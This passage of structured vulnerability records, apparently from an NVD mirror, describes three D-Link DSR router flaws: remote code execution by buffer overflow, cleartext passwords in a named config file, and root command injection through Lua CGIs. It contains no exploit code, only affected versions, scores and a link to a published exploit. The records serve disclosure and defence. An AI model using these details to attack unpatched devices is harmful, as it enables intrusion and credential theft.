"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FBD12433-5C6B-4F30-BD62-6CDDEDE5F191",
"versionEndIncluding": "3.17B901C",
"versionStartIncluding": "3.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BA55E761-BAAC-45E1-82B9-CE2046CC5DAB",
"versionEndIncluding": "3.17b901c",
"versionStartIncluding": "3.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer Overflow vulnerability in D-Link DSR-150, DSR-150N, DSR-250, DSR-250N, DSR-500N, DSR-1000N from 3.13 to 3.17B901C allows unauthenticated users to execute remote code execution."
},
{
"lang": "es",
"value": "La vulnerabilidad de desbordamiento de b\u00fafer en D-Link DSR-150, DSR-150N, DSR-250, DSR-250N, DSR-500N, DSR-1000N de 3.13 a 3.17B901C permite a usuarios no autenticados ejecutar c\u00f3digo remoto."
}
],
"id": "CVE-2024-57376",
"lastModified": "2025-07-01T15:15:40.243",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2025-01-28T22:15:15.990",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://www.dlink.com/en/security-bulletin/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-12-19 04:24
Modified
2025-04-11 00:51
Severity ?
Summary
D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 stores account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#]["Password"] fields in /tmp/teamf1.cfg.ascii.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "83CA3AD5-8BB3-4C52-B1D4-57F24C7E3ECE",
"versionEndIncluding": "1.08b29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b29:*:*:*:*:*:*:*",
"matchCriteriaId": "EDDC40C8-1BB2-4151-BAA4-E28C5AC94654",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b35:*:*:*:*:*:*:*",
"matchCriteriaId": "ADB61873-D7C7-400D-AAA3-5F65F459B573",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b46:*:*:*:*:*:*:*",
"matchCriteriaId": "2AD638F5-3A13-45D2-A343-1733611C5173",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b50:*:*:*:*:*:*:*",
"matchCriteriaId": "9A27097B-44CF-47FB-90D1-0D244209E9DC",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1F360917-0D86-4B7C-8699-EAE3A5155DAD",
"versionEndIncluding": "1.08b39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b46:*:*:*:*:*:*:*",
"matchCriteriaId": "91015BD6-F1EF-4E77-991E-5A895DF204FB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b56:*:*:*:*:*:*:*",
"matchCriteriaId": "36443128-6668-4FB6-9B96-1C695EB5B0BD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b20:*:*:*:*:*:*:*",
"matchCriteriaId": "11E46972-D923-4AB7-BC2E-49D9DBC65202",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b53:*:*:*:*:*:*:*",
"matchCriteriaId": "71900351-AF65-4AFB-A77E-361075583F43",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.08b31:*:*:*:*:*:*:*",
"matchCriteriaId": "0540F822-7F53-4282-A480-6E4A15994AF8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "289208CD-49AB-48A8-AD2E-BF4AFA479990",
"versionEndIncluding": "1.08b51",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.01b50:*:*:*:*:*:*:*",
"matchCriteriaId": "0FA9027F-9EBE-45FB-8128-E1E27F1B12EF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b11:*:*:*:*:*:*:*",
"matchCriteriaId": "90E36C7E-02A1-4389-A706-B73D6C236E50",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b25:*:*:*:*:*:*:*",
"matchCriteriaId": "D5146B3C-CC4C-49C4-9B8B-BF9FC3E45293",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b12:*:*:*:*:*:*:*",
"matchCriteriaId": "79117184-9444-443B-9CF8-F4D2E19413A3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b23:*:*:*:*:*:*:*",
"matchCriteriaId": "AD92EB60-B33E-4653-BE5B-449DC18E073F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b27:*:*:*:*:*:*:*",
"matchCriteriaId": "DAE86995-60E0-4F50-A008-EBB227CC4207",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b36:*:*:*:*:*:*:*",
"matchCriteriaId": "9B6BA51E-FCC6-4BCC-A4FF-AF49602C6D5C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b43:*:*:*:*:*:*:*",
"matchCriteriaId": "484A7789-9A84-4E01-B7C8-97FC769D21AA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.04b58:*:*:*:*:*:*:*",
"matchCriteriaId": "592C6173-8084-4857-AD6A-DDF9F66CE881",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b43:*:*:*:*:*:*:*",
"matchCriteriaId": "A8025D5C-331B-4A62-9A0D-29EA63E7AB30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b53:*:*:*:*:*:*:*",
"matchCriteriaId": "2987ACFB-FE89-4901-8A64-B5B61F4D4EE1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F2655D2C-0A71-4F14-8CB6-9A8E5B0BA2D2",
"versionEndIncluding": "1.05b48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2616EA9D-842A-4C08-BEC0-DD0DE15627C4",
"versionEndIncluding": "1.08b51",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b11:*:*:*:*:*:*:*",
"matchCriteriaId": "86F457CD-2B3A-4571-941B-CEEAD52635C3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b25:*:*:*:*:*:*:*",
"matchCriteriaId": "7D5FB42D-B664-4CD1-A9BE-BEEB3D2455F6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b12:*:*:*:*:*:*:*",
"matchCriteriaId": "0836B735-04EB-46DA-A5FD-918CF254DC6D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b23:*:*:*:*:*:*:*",
"matchCriteriaId": "C40D5762-D950-4C59-8E60-AD63A5C4F43E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b27:*:*:*:*:*:*:*",
"matchCriteriaId": "CD052065-A62C-4E77-AF30-A7BFE87BEF0D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b36:*:*:*:*:*:*:*",
"matchCriteriaId": "84589477-A03F-4350-8F48-AA65A3E2F8EB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b43:*:*:*:*:*:*:*",
"matchCriteriaId": "73B9957F-92B8-471A-90C1-541857228220",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.04b58:*:*:*:*:*:*:*",
"matchCriteriaId": "BB19EF7D-8CDD-4640-B272-2B31C6C8DC40",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b43:*:*:*:*:*:*:*",
"matchCriteriaId": "D3DE0EAD-26FE-4A08-8B3F-94B7B46B3EE2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b53:*:*:*:*:*:*:*",
"matchCriteriaId": "3EEC400B-B9A7-4672-98BB-57EE722FDDBB",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8A6B7598-20C1-4F1A-BFA8-16C66D210216",
"versionEndIncluding": "1.08b51",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.01b50:*:*:*:*:*:*:*",
"matchCriteriaId": "6F9A4E2D-8F74-4CD3-85F0-5DA4749B0F9F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b11:*:*:*:*:*:*:*",
"matchCriteriaId": "2DA26493-2F60-41C1-9563-75FAA116DBA2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b25:*:*:*:*:*:*:*",
"matchCriteriaId": "4D5BA908-B289-4917-8AE3-E57DACB93501",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b12:*:*:*:*:*:*:*",
"matchCriteriaId": "9B94BCF9-13FC-4930-92A4-6AF97699672B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b23:*:*:*:*:*:*:*",
"matchCriteriaId": "F1AED08D-47B4-4A13-8291-2E49AEB1B69F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b27:*:*:*:*:*:*:*",
"matchCriteriaId": "2904D8F1-633D-4DF8-9808-2961998CE510",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b36:*:*:*:*:*:*:*",
"matchCriteriaId": "FE195794-EDE9-477A-9934-8CE2ED1B19E7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b43:*:*:*:*:*:*:*",
"matchCriteriaId": "BC8C2F15-6867-4647-9D2F-8F3D9F3054DD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.04b58:*:*:*:*:*:*:*",
"matchCriteriaId": "AFF08CD6-A360-4291-8159-DB2A07B8F2A6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b43:*:*:*:*:*:*:*",
"matchCriteriaId": "DDDBCCF6-71B8-45A8-86C4-97B622793179",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b53:*:*:*:*:*:*:*",
"matchCriteriaId": "FF0BFC1A-B6DF-4D2E-9DD9-566E20CAD172",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AFF423A8-2E0B-4618-B384-5C97B4315B88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8875595-6A45-41F4-BD4F-88E4B01987FB",
"versionEndIncluding": "1.08b39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b46:*:*:*:*:*:*:*",
"matchCriteriaId": "4D87E55E-8FB9-46DD-B7E3-0FF5844AACCE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b56:*:*:*:*:*:*:*",
"matchCriteriaId": "7054BD9D-2CBD-4EB2-A52C-6EAD0DF16CEA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b20:*:*:*:*:*:*:*",
"matchCriteriaId": "7C7D6C20-02AB-45C2-8DF6-7406EF4B9E09",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b53:*:*:*:*:*:*:*",
"matchCriteriaId": "20584156-C553-4AEA-A19C-A4BB67B5390A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.08b31:*:*:*:*:*:*:*",
"matchCriteriaId": "1CB44CCA-AC5E-4169-A4DA-8873C1435C04",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CA8E760B-FBD1-4949-9E7C-35E216094B58",
"versionEndIncluding": "1.08b51",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b11:*:*:*:*:*:*:*",
"matchCriteriaId": "F0478AA5-8740-4458-855A-11804597FA6C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b25:*:*:*:*:*:*:*",
"matchCriteriaId": "A6009D02-5CE9-4D08-8C6A-005F66ED8A29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b12:*:*:*:*:*:*:*",
"matchCriteriaId": "2DBC6011-8C8A-4EAA-8B6B-933C128E7A97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b23:*:*:*:*:*:*:*",
"matchCriteriaId": "540C7261-9352-4CF1-BCF8-13615EFB7C4E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b27:*:*:*:*:*:*:*",
"matchCriteriaId": "31C51D13-005D-4CB0-AB05-D38CC4E5096B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b36:*:*:*:*:*:*:*",
"matchCriteriaId": "4C3F3332-EEE2-492F-9585-62E4256ECBC5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b43:*:*:*:*:*:*:*",
"matchCriteriaId": "0DE1C593-B0E7-4715-9AA5-CF7A3A87F05E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.04b58:*:*:*:*:*:*:*",
"matchCriteriaId": "2D4D1637-5291-45CD-BA6A-B71D9199F0F2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b43:*:*:*:*:*:*:*",
"matchCriteriaId": "25136989-A83E-4C65-A354-8A0E2101EE26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b53:*:*:*:*:*:*:*",
"matchCriteriaId": "36E387CF-AAE4-4EED-A7E2-6D2FE9B5933F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4B085DCB-4804-43ED-8634-0B4EB8DCD750",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 stores account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#][\"Password\"] fields in /tmp/teamf1.cfg.ascii."
},
{
"lang": "es",
"value": "D-Link DSR-150 con firmware anterior a 1.08B44; DSR-150N con firmware anterior a 1.06B64; DSR-250 y DSR-250N con firmware anterior a 1.08B44; y DSR-500, DSR-500N, DSR-1000 y DSR-1000N con firmware anterior a 1.08B77, almacena contrase\u00f1as de cuentas en texto plano, lo cual permite a usuarios locales obtener informaci\u00f3n sensible leyendo los campos Users[#][\"Password\"] en 7tmp/teamf1.cfg.ascii."
}
],
"id": "CVE-2013-7005",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-12-19T04:24:57.493",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.exploit-db.com/exploits/30061"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.exploit-db.com/exploits/30061"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-12-15 20:15
Modified
2024-11-21 05:18
Severity ?
Summary
A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dsr-150_firmware | * | |
| dlink | dsr-150 | - | |
| dlink | dsr-150n_firmware | * | |
| dlink | dsr-150n | - | |
| dlink | dsr-250_firmware | * | |
| dlink | dsr-250 | - | |
| dlink | dsr-250n_firmware | * | |
| dlink | dsr-250n | - | |
| dlink | dsr-500_firmware | * | |
| dlink | dsr-500 | - | |
| dlink | dsr-500n_firmware | * | |
| dlink | dsr-500n | - | |
| dlink | dsr-500ac_firmware | * | |
| dlink | dsr-500ac | - | |
| dlink | dsr-1000_firmware | * | |
| dlink | dsr-1000 | - | |
| dlink | dsr-1000n_firmware | * | |
| dlink | dsr-1000n | - | |
| dlink | dsr-1000ac_firmware | * | |
| dlink | dsr-1000ac | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "93C5755D-5EB7-449E-81D9-20DBA0F36345",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3AE6313B-F71A-4AE4-8778-E30A93B1942B",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1ABEF03D-2411-4B84-BB67-831DC0164C9D",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "834CDDBF-DC00-40FD-86C1-9AF2A42BB317",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "64D78EB2-B98D-4196-B678-BF43227770F2",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A56B78EB-01FB-472A-B147-F2DF9E1C70E1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4B085DCB-4804-43ED-8634-0B4EB8DCD750",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500ac_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC42D575-0178-43EF-814F-DE6D738FB2A5",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500ac:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC082E6B-E33F-4A69-A9B7-5E4D2D03C996",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "19A81670-E7DA-4179-A0A5-00938299BF6C",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AFF423A8-2E0B-4618-B384-5C97B4315B88",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "82F0849C-8622-4839-BE2B-DCDE9CE7B257",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000ac_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E7F64A55-D6BF-4440-8336-22E5C1BF36D0",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000ac:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3DD4F77B-72B4-4261-884C-8F17B52A4643",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17."
},
{
"lang": "es",
